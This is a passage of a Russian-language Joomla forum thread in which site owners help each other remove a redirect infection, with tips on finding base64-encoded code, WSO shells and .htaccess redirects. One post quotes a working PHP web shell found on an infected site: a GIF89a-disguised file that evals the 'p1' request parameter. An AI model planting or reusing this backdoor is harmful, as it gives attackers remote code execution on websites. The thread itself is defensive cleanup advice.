Вирус на сайте, редирект, что делать как лечить! - страница 2 - Безопасность сайтов на Joomla

Polosat, вам интересен сам механизм ридеректа?

evgen777 - интересно побороть эту заразу, так как перебрал уже все методы, а через поисковик все равно происходит редирект. Раньше и напрямую был редирект, теперь только через пс Яндекс.

помимо разных стандартных base64, было ещё вот это

images/stories/story.php

в файле  LICESNE.php в корне Joomla!

я на 3 сайтах клиента такую бяку вычищал...
побороть можно только одним методом-найти "черный вход" на сайт и перекрыть его.
сделать это можно только анализируя логи доступа к сайту...

images/stories/story.php

это первоначальный шелл служащий для заливки основного шелла
а в LICENSES.php типичный шелл WSO
JCE установлен? Версия ниже 2.2.0?

вы не дочистили где то еще что то есть

@flyingspook вот моя ася 609858754

Выражаю огромную благодарность товарищу icom

благодаря его меткому глазу и полезному скрипту, и поиску по фразе "eval(ba"  удалось найти зараженные файлы, видимо вебшел пробивал на уязвимость файлы и вписывался куда мог... остатки вредоносного редиректа были во всех файлах плагина JoomDefender и как ни странно в "антивирусном" fls.php

В общем рекомендую в случае когда ничего не помогает, обращаться к icom

помимо разных стандартных base64, было ещё вот это

images/stories/story.php

Код

GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>

Ищите еще файл .php там же в /images, содержащим часть названия GIF89a1.
Что то типа cacheGIF89a1.php

draff - спасибо, это все сделал, на этапе "перепробовал все методы"

Тьфу тьфу теперь все чисто.

Выражаю огромную благодарность товарищу icom

благодаря его меткому глазу и полезному скрипту, и поиску по фразе "eval(ba"  удалось найти зараженные файлы, видимо вебшел пробивал на уязвимость файлы и вписывался куда мог... остатки вредоносного редиректа были во всех файлах плагина JoomDefender и как ни странно в "антивирусном" fls.php

В общем рекомендую в случае когда ничего не помогает, обращаться к icom

с fls.php было все нормально, просто в нем фраза "eval(ba" попалась, что нормально

кстати свой скрипт для поиска и замены текста подправил немного, теперь можно искать используя регулярные выражения + еще некоторые доработки, завтра ссылку выложу

в файле fls я добавил еще такие строчки в массив $strings
тоже недавно боролся с взломом 1.5 Joomla.
и еще заметил что в модули добавляется mod_system/mod_google (которого по умолчанию нет в Joomla)

String:: zerofill - это нормально?

почти на всех сайтах аккаунта в хостинге появился такой редирект:
36mafia(.)ru

не могу найти где сидит вирусня. помогите  !

String:: zerofill - это нормально?

есть по стандарту в движке такое, бывает и в shell тоже, смотрим визуально

не могу найти где сидит вирусня. помогите  !

смотрите
.htaccess посмотрите на редирект
*.js файлы - приписку в конце
*.php - base64 закодированый

в файлах может быть прописан код с права в конце, ползунок переместите если есть место в правую сторону

подскажите пожалуйста, как это раскодировать

подскажите пожалуйста, как это раскодировать

что то типа того но не весь кусок

А может зараза пролезть, если в некоторых папках отсутствуют пустые index.html?

flyingspook, можете сказать, КАК вы это сделали? Я гуглил функции декодирование функции eval, но результата не добился.
Заранее спасибо

Я не понял, как пошагово удалить вирус sejeal?

я делал так

выкачал весь сайт на комп
удалил подозрительные файлы
запустил kaspersky virus removal tool
оно нашло вирусные файлы и удалило их
залил обратно
залил поверх свежую версию Joomla
выполнил пару рекомендация с тем из форума

Я не понял, как пошагово удалить вирус sejeal?

опишите подробней
-что происходит?
-логи смотрели?
-что сами делали?

вы просите ответить на вопрос который собственно не задали в развернутом виде, на такой вопрос можно ответить только
так - удалить и почистить все
потому что кто знает для него это правильный ответ, а так как вы не знаете и просите помощи пишите развернуто

и будет ответ развернутый
пока набирал вам уже и отвечают 

fls.php - далеко не всё показывает. Выводит несколько файлов, но их может быть гораздо больше.

ну так вы анализируйте, анализируйте...

Чем больше читаю на форуме, тем сильнее запутался. Задам вопросы, по возможности дайте развернутый ответ.
На хостинге размещены 5 сайтов, у 3 из начались глюки в админке с компонетами K2, akeeba backup и основной панелью управления.
Фото:
http://мысли-вслух.рф/_ph/1/140316431.gif - akeeba backup 1
http://мысли-вслух.рф/_ph/1/907223235.gif - akeeba backup 2
http://мысли-вслух.рф/_ph/1/950877315.gif - К2
http://мысли-вслух.рф/_ph/1/449987437.gif - панель управления "Общие настройки" ссылки Сайт, Система, Сервер, Права, Сохранить, Сохранить и закрыть - не кликабельны и вся инфа на одной странице.
http://мысли-вслух.рф/_ph/1/819180442.gif

А у одного сайта белый экрана странице входа в админку.
Решил проблему комментированием этой строки.

И случилось это со всеми сайтами одновременно за одну ночь.

Запросил у хостера резервные копии, восстановил, всё отлично стало. Но через день начинается такая же ерунда по очереди на каждом сайте (белый экран, K2, и т.д.).
Скачал сайты на комп, проверил анитивиром. ТИШИНА, ни чего не нашел.

Что делать дальше?

Пробавал тотал командером и Notepad++ искать в файлах текст eval(,  eval(base64_decode и ;document.write(

Есть разные и такие:

Пробовал ставить fls, выдает кучу файлов, а что с ними делать ума не приложу. Сравнивал файл найденый сканером с оригиналом, они одинаковые.
Скажите что искать в коде файлов?

maxis тоже молодец

"Лично я с помощью fls.php, только на третьей ветке форума случайно понял на что надо обращать внимание"

- раз понял, так объясни другим. Помоги понять.

Решил проблему комментированием этой строки.

правильное решение обновить до актуальной версии, у Вас костыль

Есть разные и такие:

это и есть "злой" код
вам надо найти shell

по чему и хотел в одну тему обсуждения вынести писать одно и тоже это долго и не благодарно давайте почитаете тут
http://joomlaforum.ru/index.php/topic,247405.0.html
а обсуждать будем все таки тут, уважайте отвечающих они скоро отвечать перестанут прыгая по топикам, и будем видеть только

Народ, нужна помощь. Вычистил сайт от заразы, сканируя бесплатным скриптом ai-bolit
Последовал советам из статьи: 7 советов по оптимизации безопасности Joomla!
Залил на хостинг, на сайт не заходит с моего компа вообще, консоль файрфокса выдает: [20:26:51.914] Load denied by X-Frame-Options: http://www.google.ru/ does not permit cross-origin framing.
Друг говорит, что у него грузится, но все с теми же вредоносными iframe
Как быть?
Сайт

Как быть?

перестать спамить

flyingspook
Это шутка? Каким мне еще образом показать, что у меня за проблема, если не указывать сайт - ее источник? Полагаю, знающим людям достаточно одного взгляда на зараженный сайт, чтобы понять в чем причина или хотя бы дать какие-либо советы. Если вас это так задевает, скрою заголовок под ссылку.

Это шутка? Каким мне еще образом показать, что у меня за проблема, если не указывать сайт - ее источник?

При загрузке я вижу это -
Так должно быть?
Но внизу есть сообщение об ошибке: Warning: call_user_func(tdo) [function.call-user-func]: First argument is expected to be a valid callback in /home/d/dalnoboy/public_html/templates/themza_j15_77/html/pagination.php on line 154